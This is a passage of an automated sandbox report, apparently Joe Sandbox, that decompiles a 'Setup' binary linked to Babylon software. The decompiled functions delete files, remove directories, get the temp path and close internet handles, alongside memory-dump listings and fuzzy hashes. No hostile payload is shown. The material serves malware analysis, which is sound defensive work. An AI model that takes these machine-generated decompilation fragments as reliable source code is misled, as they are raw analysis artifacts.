                                                                                                                                                              0x0042527c

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileFindLibraryLoadNamePath_wcscpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 138660897-0
                                                                                                                                                              • Opcode ID: 27f36e94a2a0778c7418ac5df22fa15c45a046c2cd3d214a7575e3742c6b0493
                                                                                                                                                              • Instruction ID: a037339b6b14c3ba7ad3918af33b6b3a3ac40648552c2881e58c205521017534
                                                                                                                                                              • Opcode Fuzzy Hash: 27f36e94a2a0778c7418ac5df22fa15c45a046c2cd3d214a7575e3742c6b0493
                                                                                                                                                              • Instruction Fuzzy Hash: 1C2193B4A4011CCBDB14EF54E888BE9B7B1AF28304F4485DAE40D5B351D7749E84CFA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0049E5B0 Relevance: 4.5, APIs: 3, Instructions: 33fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                              			E0049E5B0(void* __ecx, intOrPtr _a4, signed char _a8) {
				long _v8;
				int _t9;

				_push(__ecx);
				if((_a8 & 0x000000ff) != 0) {
					SetFileAttributesW(E00416A30(_a4 + 4), 0x80);
				}
				_t9 = DeleteFileW(E00416A30(_a4 + 4)); // executed
				if(_t9 != 0) {
					return 1;
				} else {
					_v8 = GetLastError();
					if(_v8 == 2 || _v8 == 3) {
						return 1;
					} else {
						return 0;
					}
				}
			}





                                                                                                                                                              0x0049e5b3
                                                                                                                                                              0x0049e5ba
                                                                                                                                                              0x0049e5cd
                                                                                                                                                              0x0049e5cd
                                                                                                                                                              0x0049e5df
                                                                                                                                                              0x0049e5e7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0049e5e9
                                                                                                                                                              0x0049e5ef
                                                                                                                                                              0x0049e5f6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0049e602
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0049e602
                                                                                                                                                              0x0049e5f6

                                                                                                                                                              APIs
                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,004F721A,?,00000000,bab_tmp_web.html,00000000,00000000,00000000,DDD124F9), ref: 0049E5CD
                                                                                                                                                              • DeleteFileW.KERNEL32(00000000,?,?,004F721A,?,00000000,bab_tmp_web.html,00000000,00000000,00000000,DDD124F9), ref: 0049E5DF
                                                                                                                                                              • GetLastError.KERNEL32(?,004F721A,?,00000000,bab_tmp_web.html,00000000,00000000,00000000,DDD124F9), ref: 0049E5E9
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$AttributesDeleteErrorLast
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1736513994-0
                                                                                                                                                              • Opcode ID: c92789c02eee6c880e195e83b484d1ee3f6e110011f4c04e5ce39a863ca8df47
                                                                                                                                                              • Instruction ID: 6351115cbb09d7aa138f8d0f2ad5c1d28e13df6de63dbdbedb9bb6d0ae47607d
                                                                                                                                                              • Opcode Fuzzy Hash: c92789c02eee6c880e195e83b484d1ee3f6e110011f4c04e5ce39a863ca8df47
                                                                                                                                                              • Instruction Fuzzy Hash: 4AF0E930541214BBEF10DFB3C81D2BE7F68AE2231EF40C06AF80257301DA38DA04EA69
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00455218 Relevance: 4.5, APIs: 3, Instructions: 21COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00455218(WCHAR* _a4) {
				int _t2;
				long _t3;

				_t2 = RemoveDirectoryW(_a4); // executed
				if(_t2 != 0) {
					_t3 = 0;
				} else {
					_t3 = GetLastError();
				}
				if(_t3 == 0) {
					return 0;
				} else {
					return E0045449D(_t3) | 0xffffffff;
				}
			}





                                                                                                                                                              0x00455220
                                                                                                                                                              0x00455228
                                                                                                                                                              0x00455232
                                                                                                                                                              0x0045522a
                                                                                                                                                              0x0045522a
                                                                                                                                                              0x0045522a
                                                                                                                                                              0x00455236
                                                                                                                                                              0x00455247
                                                                                                                                                              0x00455238
                                                                                                                                                              0x00455243
                                                                                                                                                              0x00455243

                                                                                                                                                              APIs
                                                                                                                                                              • RemoveDirectoryW.KERNEL32(000000FF,?,0049E5A4,00000000,?,004D65B9,?,000000FF,000000FF,0000005C,000000FF,?,00000000,00000000,DDD124F9), ref: 00455220
                                                                                                                                                              • GetLastError.KERNEL32(?,0049E5A4,00000000,?,004D65B9,?,000000FF,000000FF,0000005C,000000FF,?,00000000,00000000,DDD124F9), ref: 0045522A
                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00455239
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DirectoryErrorLastRemove__dosmaperr
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4061612599-0
                                                                                                                                                              • Opcode ID: 4f121293ec929a833d3eeb2b2a184cae1bd3b805ed201971d6b715f4f866c10b
                                                                                                                                                              • Instruction ID: 3663204bc7aed2f6ba477911cfe8aae5d527464cf46f9ba901a5bb3a8d9226d4
                                                                                                                                                              • Opcode Fuzzy Hash: 4f121293ec929a833d3eeb2b2a184cae1bd3b805ed201971d6b715f4f866c10b
                                                                                                                                                              • Instruction Fuzzy Hash: 07D05E31244A05669B001BB6AC1C9373B9C9A8137AB1586A6FC2CC8192EF29C858AE95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004F78F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 138COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 91%
                                                                                                                                                              			E004F78F0(intOrPtr __ebx, WCHAR* __ecx, intOrPtr __edi, intOrPtr __esi, WCHAR* _a4, intOrPtr _a8) {
				signed char _v8;
				char _v16;
				WCHAR* _v20;
				signed int _v24;
				char _v544;
				char _v576;
				char _v577;
				char _v612;
				char _v613;
				WCHAR* _v620;
				signed int _v624;
				signed int _t53;
				signed int _t54;
				intOrPtr _t63;
				signed int _t90;
				void* _t91;
				void* _t92;

				_t89 = __esi;
				_t88 = __edi;
				_t69 = __ebx;
				_push(0xffffffff);
				_push(0x5099f7);
				_push( *[fs:0x0]);
				_t92 = _t91 - 0x260;
				_t53 =  *0x561244; // 0xddd124f9
				_t54 = _t53 ^ _t90;
				_v24 = _t54;
				_push(_t54);
				 *[fs:0x0] =  &_v16;
				_v620 = __ecx;
				_v20 = 0x80004005;
				_v624 = E004F7700(_v620, _a8);
				_t73 = _v624 - 1;
				_v624 = _v624 - 1;
				if(_v624 > 4) {
					L12:
					_t95 = _v20;
					if(_v20 != 0) {
						E00417910(_v620, E00434050( &_v613));
						_v8 = 1;
						E004181D0(_a4,  &_v612);
						_v8 = 0xffffffff;
						E004176E0();
					} else {
						_t87 = _a4;
						E00422290(_t69, _t73, _t88, _t89, _t95, _a4);
						E004130D0( &(_a4[2]), L"Babylon\\");
					}
					_t63 = E00416A30( &(_a4[2]));
					 *[fs:0x0] = _v16;
					return E0044F6C8(_t63, _t69, _v24 ^ _t90, _t87, _t88, _t89);
				}
				_t87 = _v624;
				switch( *((intOrPtr*)(_v624 * 4 +  &M004F7AF4))) {
					case 0:
						_t68 = E00495D00(__ebx, __edi, __esi, 0x23, _a4, 1, 1); // executed
						_t92 = _t92 + 0x10;
						_v20 = _t68;
						goto L12;
					case 1:
						__ecx = _a4;
						__eax = E00495D00(__ebx, __edi, __esi, 0x1a, _a4, 1, 1); // executed
						_v20 = __eax;
						goto L12;
					case 2:
						__edx = _a4;
						__eax = E00495D00(__ebx, __edi, __esi, 0x1c, _a4, 1, 1); // executed
						_v20 = __eax;
						__eflags = _v20;
						if(__eflags != 0) {
							goto L6;
						}
						goto L12;
					case 3:
						L10:
						__edx =  &_v544;
						__eax = GetTempPathW(0x104, __edx);
						__ecx = 0;
						__eflags = 0 - __eax;
						asm("sbb edx, edx");
						__edx = __edx & 0x7fffbffb;
						__edx =  &(__edx[0xffffffffc0002003]);
						__eflags = __edx;
						_v20 = __edx;
						if(__eflags == 0) {
							__ecx =  &_v577;
							E00434050( &_v577) =  &_v544;
							__ecx =  &_v576;
							__eax = E00417910( &_v544,  &_v544);
							_v8 = 0;
							__ecx =  &_v576;
							__ecx = _a4;
							__eax = E004181D0(_a4,  &_v576);
							_v8 = 0xffffffff;
							__ecx =  &_v576;
							__eax = E004176E0();
						}
						goto L12;
					case 4:
						L6:
						__eax = _a4;
						__ecx = _v620;
						_v20 = E004F77C0(__ebx, __ecx, __edi, __esi, __eflags, _a4);
						__eflags = _v20;
						if(_v20 < 0) {
							__ecx = _a4;
							_v20 = E00495D00(__ebx, __edi, __esi, 0x1c, _a4, 1, 1);
						}
						__eflags = _v20;
						if(__eflags != 0) {
							goto L10;
						} else {
							goto L12;
						}
				}
			}




















                                                                                                                                                              0x004f78f0
                                                                                                                                                              0x004f78f0
                                                                                                                                                              0x004f78f0
                                                                                                                                                              0x004f78f3
                                                                                                                                                              0x004f78f5
                                                                                                                                                              0x004f7900
                                                                                                                                                              0x004f7901
                                                                                                                                                              0x004f7907
                                                                                                                                                              0x004f790c
                                                                                                                                                              0x004f790e
                                                                                                                                                              0x004f7911
                                                                                                                                                              0x004f7915
                                                                                                                                                              0x004f791b
                                                                                                                                                              0x004f7921
                                                                                                                                                              0x004f7937
                                                                                                                                                              0x004f7943
                                                                                                                                                              0x004f7946
                                                                                                                                                              0x004f7953
                                                                                                                                                              0x004f7a63
                                                                                                                                                              0x004f7a63
                                                                                                                                                              0x004f7a67
                                                                                                                                                              0x004f7aa0
                                                                                                                                                              0x004f7aa5
                                                                                                                                                              0x004f7ab6
                                                                                                                                                              0x004f7abb
                                                                                                                                                              0x004f7ac8
                                                                                                                                                              0x004f7a69
                                                                                                                                                              0x004f7a69
                                                                                                                                                              0x004f7a6d
                                                                                                                                                              0x004f7a80
                                                                                                                                                              0x004f7a80
                                                                                                                                                              0x004f7ad3
                                                                                                                                                              0x004f7adb
                                                                                                                                                              0x004f7af0
                                                                                                                                                              0x004f7af0
                                                                                                                                                              0x004f7959
                                                                                                                                                              0x004f795f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f7975
                                                                                                                                                              0x004f797a
                                                                                                                                                              0x004f797d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f7989
                                                                                                                                                              0x004f798f
                                                                                                                                                              0x004f7997
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f79a3
                                                                                                                                                              0x004f79a9
                                                                                                                                                              0x004f79b1
                                                                                                                                                              0x004f79b4
                                                                                                                                                              0x004f79b8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f79f4
                                                                                                                                                              0x004f79f4
                                                                                                                                                              0x004f7a00
                                                                                                                                                              0x004f7a06
                                                                                                                                                              0x004f7a08
                                                                                                                                                              0x004f7a0a
                                                                                                                                                              0x004f7a0c
                                                                                                                                                              0x004f7a12
                                                                                                                                                              0x004f7a12
                                                                                                                                                              0x004f7a18
                                                                                                                                                              0x004f7a1b
                                                                                                                                                              0x004f7a1d
                                                                                                                                                              0x004f7a29
                                                                                                                                                              0x004f7a30
                                                                                                                                                              0x004f7a36
                                                                                                                                                              0x004f7a3b
                                                                                                                                                              0x004f7a42
                                                                                                                                                              0x004f7a49
                                                                                                                                                              0x004f7a4c
                                                                                                                                                              0x004f7a51
                                                                                                                                                              0x004f7a58
                                                                                                                                                              0x004f7a5e
                                                                                                                                                              0x004f7a5e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f79bf
                                                                                                                                                              0x004f79bf
                                                                                                                                                              0x004f79c3
                                                                                                                                                              0x004f79ce
                                                                                                                                                              0x004f79d1
                                                                                                                                                              0x004f79d5
                                                                                                                                                              0x004f79db
                                                                                                                                                              0x004f79e9
                                                                                                                                                              0x004f79e9
                                                                                                                                                              0x004f79ec
                                                                                                                                                              0x004f79f0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f79f2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f79f2
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?,00000000,?,?,?,?,?,?,?,Babylon\), ref: 004F7A00
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: PathTemp
                                                                                                                                                              • String ID: Babylon\
                                                                                                                                                              • API String ID: 2920410445-964554263
                                                                                                                                                              • Opcode ID: c93090c39fa83e8d30784dd74e6697c71b14cdb4a9cf41bab932b34c23336e0c
                                                                                                                                                              • Instruction ID: 9b04c22fcb007ae7e9457040daaacfd2f73ff2dc511d6759e3a31cb4679aa1fb
                                                                                                                                                              • Opcode Fuzzy Hash: c93090c39fa83e8d30784dd74e6697c71b14cdb4a9cf41bab932b34c23336e0c
                                                                                                                                                              • Instruction Fuzzy Hash: 40516CB190811CABDB14EF64DC85BFEB775EB04304F1046AEE6156A281DBB96B80CF94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004549D5 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 70%
                                                                                                                                                              			E004549D5(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t19;
				intOrPtr _t22;
				void* _t33;
				void* _t34;

				_t30 = __edi;
				_t29 = __edx;
				_push(0xc);
				_push(0x544300);
				E00456860(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t33 - 0x1c)) = 0;
				if( *((intOrPtr*)(_t33 + 0x10)) == 0 ||  *((intOrPtr*)(_t33 + 0x14)) == 0) {
					L6:
					_t19 = 0;
				} else {
					if( *((intOrPtr*)(_t33 + 0x18)) != 0) {
						E0045D801( *((intOrPtr*)(_t33 + 0x18)));
						 *((intOrPtr*)(_t33 - 4)) = 0;
						_t22 = E004547CB(__edx,  *((intOrPtr*)(_t33 + 8)),  *((intOrPtr*)(_t33 + 0xc)),  *((intOrPtr*)(_t33 + 0x10)),  *((intOrPtr*)(_t33 + 0x14)),  *((intOrPtr*)(_t33 + 0x18))); // executed
						 *((intOrPtr*)(_t33 - 0x1c)) = _t22;
						 *((intOrPtr*)(_t33 - 4)) = 0xfffffffe;
						E00454A61();
						_t19 =  *((intOrPtr*)(_t33 - 0x1c));
					} else {
						_t41 =  *((intOrPtr*)(_t33 + 0xc)) - 0xffffffff;
						if( *((intOrPtr*)(_t33 + 0xc)) != 0xffffffff) {
							E00451D90(__edi,  *((intOrPtr*)(_t33 + 8)), 0,  *((intOrPtr*)(_t33 + 0xc)));
							_t34 = _t34 + 0xc;
						}
						 *((intOrPtr*)(E00454477(_t41))) = 0x16;
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E004557A5(_t29, _t30, 0);
						goto L6;
					}
				}
				return E004568A5(_t19);
			}







                                                                                                                                                              0x004549d5
                                                                                                                                                              0x004549d5
                                                                                                                                                              0x004549d5
                                                                                                                                                              0x004549d7
                                                                                                                                                              0x004549dc
                                                                                                                                                              0x004549e3
                                                                                                                                                              0x004549e9
                                                                                                                                                              0x00454a22
                                                                                                                                                              0x00454a22
                                                                                                                                                              0x004549f0
                                                                                                                                                              0x004549f3
                                                                                                                                                              0x00454a2d
                                                                                                                                                              0x00454a33
                                                                                                                                                              0x00454a45
                                                                                                                                                              0x00454a4d
                                                                                                                                                              0x00454a50
                                                                                                                                                              0x00454a57
                                                                                                                                                              0x00454a5c
                                                                                                                                                              0x004549f5
                                                                                                                                                              0x004549f5
                                                                                                                                                              0x004549f9
                                                                                                                                                              0x00454a02
                                                                                                                                                              0x00454a07
                                                                                                                                                              0x00454a07
                                                                                                                                                              0x00454a0f
                                                                                                                                                              0x00454a15
                                                                                                                                                              0x00454a16
                                                                                                                                                              0x00454a17
                                                                                                                                                              0x00454a18
                                                                                                                                                              0x00454a19
                                                                                                                                                              0x00454a1a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00454a1f
                                                                                                                                                              0x004549f3
                                                                                                                                                              0x00454a29

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __lock_file_memset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 26237723-0
                                                                                                                                                              • Opcode ID: 37ef9b4903a69fa08c2e22f251cd5e38d13e6d41c0040cdc2554639083a2e4eb
                                                                                                                                                              • Instruction ID: d7dfcb793dc1720f97a4c8db5cdb919cf0c013a247f2a2882a06d8a2a7a3e963
                                                                                                                                                              • Opcode Fuzzy Hash: 37ef9b4903a69fa08c2e22f251cd5e38d13e6d41c0040cdc2554639083a2e4eb
                                                                                                                                                              • Instruction Fuzzy Hash: 37018071C41209EBCF61AFA1D8028DE3B70BF5476AF00411AFC1459163D3398AAAEBD9
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00454569 Relevance: 3.0, APIs: 2, Instructions: 39COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 66%
                                                                                                                                                              			E00454569(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t18;
				signed int _t20;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t36;

				_push(0xc);
				_push(0x544298);
				E00456860(__ebx, __edi, __esi);
				 *(_t32 - 0x1c) =  *(_t32 - 0x1c) | 0xffffffff;
				_t31 =  *((intOrPtr*)(_t32 + 8));
				_t36 = _t31;
				_t37 = _t36 != 0;
				if(_t36 != 0) {
					__eflags =  *(_t31 + 0xc) & 0x00000040;
					if(( *(_t31 + 0xc) & 0x00000040) == 0) {
						E0045D801(_t31);
						 *((intOrPtr*)(_t32 - 4)) = 0;
						_t18 = E004544F2(__edx, _t31); // executed
						 *(_t32 - 0x1c) = _t18;
						 *((intOrPtr*)(_t32 - 4)) = 0xfffffffe;
						E004545DD(_t31);
					} else {
						 *(_t31 + 0xc) = 0;
					}
					_t20 =  *(_t32 - 0x1c);
				} else {
					 *((intOrPtr*)(E00454477(_t37))) = 0x16;
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t20 = E004557A5(__edx, 0, _t31) | 0xffffffff;
				}
				return E004568A5(_t20);
			}








                                                                                                                                                              0x00454569
                                                                                                                                                              0x0045456b
                                                                                                                                                              0x00454570
                                                                                                                                                              0x00454575
                                                                                                                                                              0x0045457b
                                                                                                                                                              0x00454580
                                                                                                                                                              0x00454585
                                                                                                                                                              0x00454587
                                                                                                                                                              0x004545a6
                                                                                                                                                              0x004545aa
                                                                                                                                                              0x004545b9
                                                                                                                                                              0x004545bf
                                                                                                                                                              0x004545c3
                                                                                                                                                              0x004545c9
                                                                                                                                                              0x004545cc
                                                                                                                                                              0x004545d3
                                                                                                                                                              0x004545ac
                                                                                                                                                              0x004545ac
                                                                                                                                                              0x004545ac
                                                                                                                                                              0x004545af
                                                                                                                                                              0x00454589
                                                                                                                                                              0x0045458e
                                                                                                                                                              0x00454594
                                                                                                                                                              0x00454595
                                                                                                                                                              0x00454596
                                                                                                                                                              0x00454597
                                                                                                                                                              0x00454598
                                                                                                                                                              0x004545a1
                                                                                                                                                              0x004545a1
                                                                                                                                                              0x004545b7

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00454477: __getptd_noexit.LIBCMT ref: 00454477
                                                                                                                                                                • Part of subcall function 004557A5: __decode_pointer.LIBCMT ref: 004557B0
                                                                                                                                                              • __lock_file.LIBCMT ref: 004545B9
                                                                                                                                                                • Part of subcall function 0045D801: __lock.LIBCMT ref: 0045D826
                                                                                                                                                              • __fclose_nolock.LIBCMT ref: 004545C3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 717694121-0
                                                                                                                                                              • Opcode ID: e8809228c1312b64c1facbe8e66023ba57e1e74e3ceb212012b6ea9c4ce00062
                                                                                                                                                              • Instruction ID: e4cb9d1e5c9697cfff4e0b800dbd3b9f6b75d0fe3744077fef0c531a8bdeec8e
                                                                                                                                                              • Opcode Fuzzy Hash: e8809228c1312b64c1facbe8e66023ba57e1e74e3ceb212012b6ea9c4ce00062
                                                                                                                                                              • Instruction Fuzzy Hash: CCF0F470801608A7C720BB6A880165E7AA06F8133EF61820AED759B1C3DA3C458A8B1E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004EDD10 Relevance: 3.0, APIs: 2, Instructions: 25networkCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                              			E004EDD10(void** __ecx) {
				void** _v8;
				void** _t13;

				_push(__ecx);
				_v8 = __ecx;
				if(_v8[1] != 0) {
					InternetCloseHandle(_v8[1]); // executed
				}
				if( *_v8 != 0) {
					InternetCloseHandle( *_v8);
				}
				_t13 = _v8;
				 *_t13 = 0;
				_v8[1] = 0;
				return _t13;
			}





                                                                                                                                                              0x004edd13
                                                                                                                                                              0x004edd14
                                                                                                                                                              0x004edd1e
                                                                                                                                                              0x004edd27
                                                                                                                                                              0x004edd27
                                                                                                                                                              0x004edd33
                                                                                                                                                              0x004edd3b
                                                                                                                                                              0x004edd3b
                                                                                                                                                              0x004edd41
                                                                                                                                                              0x004edd44
                                                                                                                                                              0x004edd4d
                                                                                                                                                              0x004edd57

                                                                                                                                                              APIs
                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 004EDD27
                                                                                                                                                              • InternetCloseHandle.WININET ref: 004EDD3B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
